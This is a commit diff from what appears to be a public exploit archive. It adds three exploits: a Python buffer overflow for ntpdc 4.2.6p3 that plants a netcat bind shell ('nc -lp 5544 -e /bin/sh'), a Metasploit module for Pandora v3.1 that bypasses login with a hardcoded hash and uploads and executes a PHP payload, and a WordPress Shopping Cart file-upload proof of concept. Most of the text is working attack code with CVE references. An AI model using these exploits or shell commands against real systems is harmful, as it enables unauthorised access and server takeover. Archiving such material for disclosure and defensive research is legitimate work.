Update: 2015-01-10

3 new exploits
2015-01-10 08:36:28 +00:00 · 2015-01-10 08:36:28 +00:00 · c89fb2802b
commit c89fb2802b
parent 3210d198cc
4 changed files with 243 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -32188,3 +32188,6 @@ id,file,description,date,author,platform,type,port
 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design 'filedown.php' Local File Disclosure Vulnerability",2011-05-09,KnocKout,php,webapps,0
 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0
 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere SQL Query Filter Security Bypass Vulnerability",2011-05-09,@drk1wi,multiple,remote,0
+35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80
+35731,platforms/php/remote/35731.rb,"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80
+35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
--- a/platforms/multiple/local/35732.py
+++ b/platforms/multiple/local/35732.py
@ -0,0 +1,40 @@
+# Source: https://hatriot.github.io/blog/2015/01/06/ntpdc-exploit/
+
+from os import system, environ
+from struct import pack
+import sys
+
+#
+# ntpdc 4.2.6p3 bof
+# @dronesec
+# tested on x86 Ubuntu 12.04.5 LTS
+#
+
+IMAGE_BASE = 0x80000000
+LD_INITIAL_OFFSET = 8900
+LD_TAIL_OFFSET = 1400
+
+sploit = "\x41" * 485        # junk 
+sploit += pack("<I", IMAGE_BASE + 0x000143e0) # eip
+sploit += "\x41" * 79        # junk 
+sploit += pack("<I", IMAGE_BASE + 0x0002678d) # location -0x14/-0x318 from shellcode
+
+ld_pl = ""
+ld_pl += pack("<I", 0xeeffffff) # ESI
+ld_pl += pack("<I", 0x11366061) # EDI
+ld_pl += pack("<I", 0x41414141) # EBP
+ld_pl += pack("<I", IMAGE_BASE + 0x000138f2) # ADD EDI, ESI; RET
+ld_pl += pack("<I", IMAGE_BASE + 0x00022073) # CALL EDI
+ld_pl += pack("<I", 0xbffff60d) # payload addr based on empty env; probably wrong
+
+environ["EGG"] = "/bin/nc -lp 5544 -e /bin/sh"
+
+for idx in xrange(200):
+
+    for inc in xrange(200):
+
+        ld_pl = ld_pl + "\x41" * (LD_INITIAL_OFFSET + idx)
+        ld_pl += "\x43" * (LD_INITIAL_OFFSET + inc)
+
+        environ["LD_PRELOAD"] = ld_pl
+        system("echo %s | ntpdc 2>&1" % sploit)
--- a/platforms/php/remote/35731.rb
+++ b/platforms/php/remote/35731.rb
@ -0,0 +1,166 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
+      'Description'    => %q{
+        This module exploits an authentication bypass vulnerability in Pandora v3.1 as
+        disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
+        upload which allows a user to upload arbitrary files to the '/images/' directory.
+
+        This module was created as an exercise in the Metasploit Mastery Class at Blackhat
+        that was facilitated by egypt and mubix.
+
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Juan Galiana Lara',                         # Vulnerability discovery
+          'Raymond Nunez <rcnunez[at]upd.edu.ph>',     # Metasploit module
+          'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module
+          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',      # Metasploit module
+          '_flood <freshbones[at]gmail.com>',          # Metasploit module
+          'mubix <mubix[at]room362.com>',              # Auth bypass and file upload
+          'egypt <egypt[at]metasploit.com>',           # Auth bypass and file upload
+        ],
+      'References'     =>
+        [
+          ['CVE', '2010-4279'],
+          ['OSVDB',   '69549'],
+          ['BID',   '45112']
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['Automatic Targeting', { 'auto' => true }]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Nov 30 2010",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
+      ], self.class)
+  end
+
+  def check
+
+    base  = target_uri.path
+
+    # retrieve software version from login page
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(base, 'index.php')
+      })
+      if res and res.code == 200
+        #Tested on v3.1 Build PC100609 and PC100608
+        if res.body.include?("v3.1 Build PC10060")
+          return Exploit::CheckCode::Appears
+        elsif res.body.include?("Pandora")
+          return Exploit::CheckCode::Detected
+        end
+      end
+      return Exploit::CheckCode::Safe
+    rescue ::Rex::ConnectionError
+      vprint_error("#{peer} - Connection failed")
+    end
+    return Exploit::CheckCode::Unknown
+
+  end
+
+  # upload a payload using the pandora built-in file upload
+  def upload(base, file, cookies)
+    data = Rex::MIME::Message.new
+    data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
+    data.add_part("Go", nil, nil, 'form-data; name="go"')
+    data.add_part("images", nil, nil, 'form-data; name="directory"')
+    data.add_part("1", nil, nil, 'form-data; name="upload_file"')
+    data_post = data.to_s
+    data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(base, 'index.php'),
+      'cookie'  => cookies,
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'vars_get' => {
+        'sec'  => 'gsetup',
+        'sec2' => 'godmode/setup/file_manager',
+      },
+      'data'    => data_post
+    })
+
+    register_files_for_cleanup(@fname)
+    return res
+  end
+
+  def exploit
+
+    base   = target_uri.path
+    @fname = "#{rand_text_numeric(7)}.php"
+    cookies = ""
+
+    # bypass authentication and get session cookie
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(base, 'index.php'),
+      'vars_get' => {
+        'loginhash_data'  => '21232f297a57a5a743894a0e4a801fc3',
+        'loginhash_user' => 'admin',
+        'loginhash' => '1',
+      },
+    })
+
+    # fix if logic
+    if res and res.code == 200
+      if res.body.include?("Logout")
+        cookies = res.get_cookies
+        print_status("Login Bypass Successful")
+        print_status("cookie monster = " + cookies)
+      else
+        fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")
+      end
+    end
+
+    # upload PHP payload to images/[fname]
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
+    php    = %Q|<?php #{payload.encoded} ?>|
+    begin
+      res = upload(base, php, cookies)
+    rescue ::Rex::ConnectionError
+      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
+    end
+
+    if res and res.code == 200
+      print_good("#{peer} - File uploaded successfully")
+    else
+      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
+    end
+
+    # retrieve and execute PHP payload
+    print_status("#{peer} - Executing payload (images/#{@fname})")
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(base, 'images', "#{@fname}")
+      }, 1)
+    rescue ::Rex::ConnectionError
+      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
+    end
+
+  end
+end
--- a/platforms/php/webapps/35730.txt
+++ b/platforms/php/webapps/35730.txt
@ -0,0 +1,34 @@
+# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
+# Date: 29-10-2014
+# Software Link: https://wordpress.org/plugins/wp-easycart/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# CVE: CVE-2014-9308
+# Category: webapps
+
+1. Description
+  
+Any registered user can upload any file because of incorrect if statement inside banneruploaderscript.php
+
+http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.html
+
+  
+2. Proof of Concept
+
+Login as regular user (created using wp-login.php?action=register):
+
+<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
+    <input type="hidden" name="datemd5" value="1">
+    <input type="file" name="Filedata">
+    <input value="Upload!" type="submit">
+</form>
+
+File will be visible:
+
+http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
+  
+3. Solution:
+  
+Update to version 3.0.9
+https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip